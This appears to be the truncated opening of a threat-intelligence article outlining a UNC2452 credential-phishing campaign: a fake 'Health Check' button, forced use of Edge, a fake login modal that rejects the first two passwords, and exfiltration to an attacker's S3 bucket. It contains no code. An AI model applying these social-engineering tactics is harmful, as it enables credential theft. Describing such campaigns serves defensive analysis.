The detailed breakdown of the phases involved in the malicious campaign orchestrated by UNC2452, specifically targeting credential harvesting and establishing a foothold on endpoints, is as follows:
Phase 1: Environment Establishment
Objective: Ensure that the victim uses Microsoft Edge for subsequent actions.
- Health Check Button Trigger: When the "Health Check" button is clicked, it triggers an environment check.
- Edge Browser Enforcement: If the user isn't already using Microsoft Edge, a modal appears prompting them to open the page in Edge. This ensures the attacker's scripts are executed in a controlled browser environment.
Phase 2: Credential Harvesting
Objective: Capture credentials through social engineering tactics.
- Authentication Required Modal: Upon clicking "Health Check," an authentication modal is displayed.
- Double Entry Trick: The script rejects the first two password attempts to reinforce legitimacy and ensure accurate credential capture.
- Default Email Field: The email field is pre-filled with a default value, making it easier for users to enter their credentials without suspicion.
Phase 3: Data Exfiltration
Objective: Upload harvested credentials and metadata to an attacker-controlled AWS S3 bucket while keeping the victim engaged through distraction sequences.
- **Asynchronous
Read the full article at Threat Intelligence
Want to create content about this topic? Use Nemati AI tools to generate articles, social posts, and more.
4
Contents
alinemati1983-6987Written by alinemati1983-6987
